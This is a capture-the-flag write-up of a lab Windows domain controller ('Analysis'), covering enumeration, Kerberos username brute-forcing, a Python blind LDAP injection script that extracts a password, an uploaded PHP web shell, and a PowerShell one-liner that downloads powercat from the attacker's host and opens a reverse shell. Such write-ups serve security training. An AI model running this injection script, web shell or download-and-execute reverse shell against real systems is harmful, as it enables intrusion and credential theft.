Week 3. Analysis
TL;DR
This is a Windows Server 2019 machine that hosts a web application used by a group of SOC analysts for network and incident monitoring purposes. Access to the web application is gained using ASREPRoast bruteforce and LDAP blind injection attacks. Once inside the analysts web dashboard, the report upload feature is abused to transfer a PHP reverse shell in the server, since no upload filters are in place. For the system escalation part, a DLL hijacking vulnerability affecting the Snort IT monitoring tool is exploited.
KEYWORDS
ASREPRoast, Kerbrute, blind LDAP injection, Python scripting, Snort, CVE-2016-1417, PHP shell file upload, DLL hijacking.
REFERENCES
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/README.md
https://github.com/SamJoan/ldap-brute/blob/master/wordlists/attribute_names
https://book.hacktricks.xyz/pentesting-web/ldap-injection#blind-ldap-injection
https://www.cvedetails.com/cve/CVE-2016-1417
https://packetstormsecurity.com/files/138915/Snort-2.9.7.0-WIN32-DLL-Hijacking.html
ENUMERATION
Port scan.
> nmap $target -p- -T4 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-20 17:24 EST
Host is up, received user-set (0.055s latency).
Not shown: 65083 closed tcp ports (conn-refused), 423 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
3306/tcp open mysql syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
33060/tcp open mysqlx syn-ack
47001/tcp open winrm syn-ack
49664/tcp open unknown syn-ack
49665/tcp open unknown syn-ack
49666/tcp open unknown syn-ack
49667/tcp open unknown syn-ack
49669/tcp open unknown syn-ack
49670/tcp open unknown syn-ack
49671/tcp open unknown syn-ack
49674/tcp open unknown syn-ack
49675/tcp open unknown syn-ack
49692/tcp open unknown syn-ack
49705/tcp open unknown syn-ack
52650/tcp open unknown syn-ack
Nmap done: 1 IP address (1 host up) scanned in 615.43 secondsLooks like a Windows domain controller. Enumerate the open ports.
> nmap $target -p53,80,88,135,139,445,464,593,636,3268,3269,3306,5985,9389,33060,47001 -sV -sC -Pn -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-20 17:42 EST
Host is up, received user-set (0.045s latency).
Scanned at 2024-01-20 17:42:18 EST for 54s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-01-20 22:43:13Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3306/tcp open mysql syn-ack MySQL (unauthorized)
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
33060/tcp open mysqlx? syn-ack
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.93%I=7%D=1/20%Time=65AC4C55%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOptions,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
SF:r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVersionBindReqTCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2B,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message
SF:\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SSLSessionReq,
SF:2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0f
SF:Invalid\x20message\"\x05HY000")%r(TerminalServerCookie,9,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\
SF:0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(Ker
SF:beros,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x
SF:01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(FourOhFour
SF:Request,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0
SF:\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(LDAP
SF:BindReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x01\x08\x01\x10\x88'\
SF:x1a\*Parse\x20error\x20unserializing\x20protobuf\x20message\"\x05HY000"
SF:)%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x
SF:05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(
SF:NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88
SF:'\x1a\x0fInvalid\x20message\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-t
SF:ns,32,"\x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'\x1a\x16
SF:Invalid\x20message-frame\.\"\x05HY000")%r(ms-sql-s,9,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\
SF:x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(giop,9,"\x05\0\0\
SF:0\x0b\x08\x05\x1a\0");
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 64736/tcp): CLEAN (Couldn't connect)
| Check 2 (port 7365/tcp): CLEAN (Couldn't connect)
| Check 3 (port 44409/udp): CLEAN (Failed to receive data)
| Check 4 (port 9653/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 49s
| smb2-time:
| date: 2024-01-20T22:43:49
|_ start_date: N/A
Nmap done: 1 IP address (1 host up) scanned in 54.67 secondsDNS enumeration.
> nslookup
> server 10.10.11.250
Default server: 10.10.11.250
Address: 10.10.11.250#53
> analysis.htb
Server: 10.10.11.250
Address: 10.10.11.250#53
Name: analysis.htb
Address: 10.10.11.250LDAP enumeration.
> nmap $target -p389,636 -script discovery
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-24 05:56 EST
Pre-scan script results:
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
| targets-asn:
|_ targets-asn.asn is a mandatory parameter
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Nmap scan report for analysis.htb (10.10.11.250)
Host is up (0.089s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=analysis,DC=htb
| ldapServiceName: analysis.htb:dc-analysis$@ANALYSIS.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=analysis,DC=htb
| serverName: CN=DC-ANALYSIS,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=analysis,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=analysis,DC=htb
| namingContexts: DC=analysis,DC=htb
| namingContexts: CN=Configuration,DC=analysis,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=analysis,DC=htb
| namingContexts: DC=DomainDnsZones,DC=analysis,DC=htb
| namingContexts: DC=ForestDnsZones,DC=analysis,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 373247
| dsServiceName: CN=NTDS Settings,CN=DC-ANALYSIS,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=analysis,DC=htb
| dnsHostName: DC-ANALYSIS.analysis.htb
| defaultNamingContext: DC=analysis,DC=htb
| currentTime: 20240124105741.0Z
|_ configurationNamingContext: CN=Configuration,DC=analysis,DC=htb
636/tcp open ldapssl
Service Info: Host: DC-ANALYSIS; OS: Windows
Host script results:
|_fcrdns: FAIL (No PTR record)
| dns-brute:
|_ DNS Brute-force hostnames: No results.
Nmap done: 1 IP address (1 host up) scanned in 16.95 secondsContinue fuzzing for subdomains.
> ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fc 404 -t 100 -u http://analysis.htb -H "Host: FUZZ.analysis.htb"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://analysis.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.analysis.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404
________________________________________________
internal [Status: 403, Size: 1268, Words: 74, Lines: 30, Duration: 81ms]
:: Progress: [4989/4989] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:19] :: Errors: 0 ::A subdomain is found. Continue fuzzing it at: http://internal.analysis.htb
> ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 100 -fc 404 -e .php,.html,.txt -u http://internal.analysis.htb/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://internal.analysis.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404
________________________________________________
users [Status: 301, Size: 170, Words: 9, Lines: 2, Duration: 42ms]
dashboard [Status: 301, Size: 174, Words: 9, Lines: 2, Duration: 44ms]
Users [Status: 301, Size: 170, Words: 9, Lines: 2, Duration: 51ms]
employees [Status: 301, Size: 174, Words: 9, Lines: 2, Duration: 2772ms]
Dashboard [Status: 301, Size: 174, Words: 9, Lines: 2, Duration: 101ms]
[Status: 403, Size: 1268, Words: 74, Lines: 30, Duration: 47ms]
:: Progress: [350600/350600] :: Job [1/1] :: 419 req/sec :: Duration: [0:11:19] :: Errors: 0 ::We have found 2 hidden paths at http://internal.analysis.htb/employees and http://internal.analysis.htb/users
We will fuzz both of them. Start fuzzing http://internal.analysis.htb/employees
> ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 100 -fc 404 -e .php,.html,.txt -u http://internal.analysis.htb/employees/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://internal.analysis.htb/employees/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404
________________________________________________
Login.php [Status: 200, Size: 1085, Words: 413, Lines: 30, Duration: 47ms]
login.php [Status: 200, Size: 1085, Words: 413, Lines: 30, Duration: 46ms]
:: Progress: [18852/18852] :: Job [1/1] :: 46 req/sec :: Duration: [0:01:43] :: Errors: 0 ::Looks like we have found a login portal. Check it with Firefox.
Take note of this finding and fuzz the other site at http://internal.analysis.htb/users
> ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 100 -fc 404 -e .php,.html,.txt -u http://internal.analysis.htb/users/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://internal.analysis.htb/users/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404
________________________________________________
list.php [Status: 200, Size: 17, Words: 2, Lines: 1, Duration: 120ms]
:: Progress: [18852/18852] :: Job [1/1] :: 100 req/sec :: Duration: [0:00:59] :: Errors: 0 ::If we browse this site with Firefox we receive an error: "Missing parameter".
Let's find out which is that missing parameter the application is expecting. Capture the request with Burpsuite, right-click and save to file request.txt, then edit the text file marking the fields to fuzz with ffuf
GET /users/list.php?FUZZ HTTP/1.1
Host: internal.analysis.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1Launch ffuf with the text file as argument to find the parameter.
> ffuf -c -request request.txt -request-proto http -t 100 -fs 17 -w /usr/share/seclists/Discovery/Web-Content/common.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://internal.analysis.htb/users/list.php?FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Accept-Encoding: gzip, deflate, br
:: Header : Connection: close
:: Header : Upgrade-Insecure-Requests: 1
:: Header : Host: internal.analysis.htb
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
:: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 17
________________________________________________
name [Status: 200, Size: 406, Words: 11, Lines: 1, Duration: 47ms]
:: Progress: [4713/4713] :: Job [1/1] :: 278 req/sec :: Duration: [0:00:21] :: Errors: 0 ::So it seems the application is expecting parameter called name. Check it with Firefox.
It seems the application is taking user input in the parameter name and using it to launch a query against a database to fetch user data. Then the retrieved data is presented in the web page.
At this point we can consider enumeration finished as we have found everything we need to begin exploitation. Wrapping up, this is what we have found:
The host is a domain controller, and domain name is
analysis.htbThere is an internal subdomain with a login site for employees http://internal.analysis.htb/employees/login.php
In the internal subdomain, there is another site at http://internal.analysis.htb/users/list.php where users can query a database by means of a parameter called
name. According to the list of services running, this database should be MySQL or LDAP.
USER
The employees login portal could be an entry point, but we need at least a list of valid usernames. Two options that come to mind to bruteforce usernames are an ASREPRoast attack or an RID bruteforce. Since we do not have SMB credentials, we will opt for ASREPRoast.
Two tools we can use to bruteforce usernames are GetNPUsers.py or Kerbrute. In summary, both of send a TGT request with no pre-authentication and check the KDC reply. If the user exists, the KDC will prompt pre-authentication; if not, it will reply with an user not found message. Therefore, we can find out which usernames exist and which ones not.
With GetNPUsers.py, launch an ASREPRoast attack and grep the results.
> python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py analysis.htb/ -usersfile /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt -dc-ip $target | grep UF_DONT_REQUIRE_PREAUTH | cut -d' ' -f 3
jdoe
ajohnson
cwilliams
wsmith
jangel
technicianIt is able to dump the usernames but takes a lot of time. There is a faster tool for this purpose called Kerbrute which essentially does the same: initiate a no-preauth TGT request and checks what the KDC replies.
> ./kerbrute userenum --dc $target -d analysis.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/21/24 - Ronnie Flathers @ropnop
2024/01/21 11:07:33 > Using KDC(s):
2024/01/21 11:07:33 > 10.10.11.250:88
2024/01/21 11:08:35 > [+] VALID USERNAME: jdoe@analysis.htb
2024/01/21 11:09:35 > [+] VALID USERNAME: ajohnson@analysis.htb
2024/01/21 11:11:24 > [+] VALID USERNAME: cwilliams@analysis.htb
2024/01/21 11:12:15 > [+] VALID USERNAME: wsmith@analysis.htb
2024/01/21 11:14:53 > [+] VALID USERNAME: jangel@analysis.htb
2024/01/21 11:25:16 > [+] VALID USERNAME: technician@analysis.htb
2024/01/21 11:38:12 > [+] VALID USERNAME: JDoe@analysis.htb
2024/01/21 11:38:53 > [+] VALID USERNAME: AJohnson@analysis.htb
^CIn any case, both methods return the same list of usernames. Testing them in the web site we discover the only username which is returning data in the name parameter is technician
Now let's analyze what could be happening in the backend. It seems it is taking user input in the parameter name and using it to query a database which must be either MySQL or LDAP. Therefore, this parameter could be vulnerable to injections.
Let's verify first if the parameter is injectable in MySQL with sqlmap
> sqlmap -u "http://internal.analysis.htb/users/list.php?name=technician" --batchThe tool reports the parameter does not seem to be injectable in MySQL.
[08:44:26] [WARNING] GET parameter 'name' does not seem to be injectable
[08:44:26] [CRITICAL] all tested parameters do not appear to be injectable.The other option to try is LDAP injection. For this we need to find out which LDAP attributes are present in the database for user technician. This can be done fuzzing LDAP with Burpsuite.
You can find LDAP fuzzing payloads here:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/README.md
https://book.hacktricks.xyz/pentesting-web/ldap-injection
To fuzz the application, choose a payload and capture the request with Burpsuite, then send the request to intruder. In this case, the payload used is this one:
http://internal.analysis.htb/users/list.php?name=*)(%26attribute=*)Once captured and sent to intruder, we add the section marks around the attribute to fuzz.
Then load a wordlist of possible LDAP attributes. In this case, the wordlist used is this: https://github.com/SamJoan/ldap-brute/blob/master/wordlists/attribute_names
Finally, according to our enumeration findings, we know the LDAP query is successful when the technician data is showed in the web site. Therefore, we will know if an LDAP attribute exists when the word "technician" is in the HTTP response. Configure the Burpsuite grep match to mark HTTP responses containing this word.
Run the attack and verify the responses containing the word "technician" in the results.
We notice all the attributes found are common in Active Directory except for the attribute description. This is optional and sometimes is used by system admins to add additional information such as passwords.
To dump the contents of the technician attribute description we will use a blind LDAP injection attack (https://book.hacktricks.xyz/pentesting-web/ldap-injection#blind-ldap-injection). Iterating over ASCII characters, and knowing the OK/NOK criteria (in this case, whether the response contains the text "technician" or not), we can dump the field contents. The method is similar to the process of a blind SQL injection.
The proposed blind LDAP injection script in Python to bruteforce the technician description field is the following:
#!/usr/bin/python3
import requests
import string
dictionary=string.digits+string.ascii_lowercase+string.ascii_uppercase+'@'+'.'+'#'+'$'+'%'+'&'+'*'
pattern="http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={FUZZPASS}{FUZZCHAR}*)"
password=""
run=True
print("\n[+] Running stuff...\n")
while run==True:
run=False
pattern="http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={FUZZPASS}{FUZZCHAR}*)"
for char in dictionary:
if char=='*':
pattern="http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={FUZZPASS}{FUZZCHAR})"
url=pattern.replace("{FUZZCHAR}",char).replace("{FUZZPASS}",password)
response=requests.get(url)
if "technician" in response.text:
print("[+] Char found:",password+char)
password+=char
run=True
break
print("\n[+] Removing trailing characters...")
if password[-1]=='*':
password=password.rstrip('*')
print("\n[+] Password found: ",password)There are 2 things to remark:
Since we are using wildcards in the pattern URL, we have to take into account the case an asterisk (*) is used in the middle of the password.
Because of the same reason, there will always be an asterisk at the end of the password found (a trailing character). Bear in mind trailing characters must be removed at the end of the password before finishing the process.
The description field looks like a password. Let's try credential technician@analysis.htb:97NTtl*4QP96Bv in the employees portal to login into the SOC dashboard.
Once inside the web application, we can upload a PHP reverse shell by abusing the SOC report feature, since there is no upload filter in place. The shell used is this one:
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->Which can be found in Kali location /usr/share/webshells/php/simple-backdoor.php. Just upload the file and inspect the traffic with Burpsuite. The HTTP response contains the upload path.
In fact, the upload path is /dashboard/uploads/simple.php
Use this PHP shell to send a reverse shell to our Kali machine with powercat. Serve powercat.ps1 with a Python HTTP server, then download and execute from memory using Powershell's downloadstrings. The payload to use is:
cmd=powershell iex(new-object net.webclient).downloadstring('http://<kali ip>/powercat.ps1');powercat -c <kali ip> -p 1919 -e cmdRemember to URL encode to avoid problematic characters in the URL.
A reverse shell is received on port 1919. Although it is not valid to dump user flag, we can enumerate the system from it.
> systeminfo
Nom de l'hôte: DC-ANALYSIS
Nom du système d'exploitation: Microsoft Windows Server 2019 Standard
Version du système: 10.0.17763 N/A version 17763
Type du système: x64-based PCAfter enumeration, we find out the password of user jdoe is configured in the winlogon registry key. We retrieve it by means of a registry query.
> reg query "hklm\software\microsoft\windows nt\currentversion\winlogon"
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ analysis.htb.
DefaultUserName REG_SZ jdoe
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
ShellAppRuntime REG_SZ ShellAppRuntime.exe
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x1ab910533
ShutdownFlags REG_DWORD 0x13
DisableLockWorkstation REG_DWORD 0x0
AutoAdminLogon REG_SZ 1
DefaultPassword REG_SZ 7y4Z4^*y9Zzj
AutoLogonSID REG_SZ S-1-5-21-916175351-3772503854-3498620144-1103
LastUsedUsername REG_SZ jdoe
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\AlternateShells
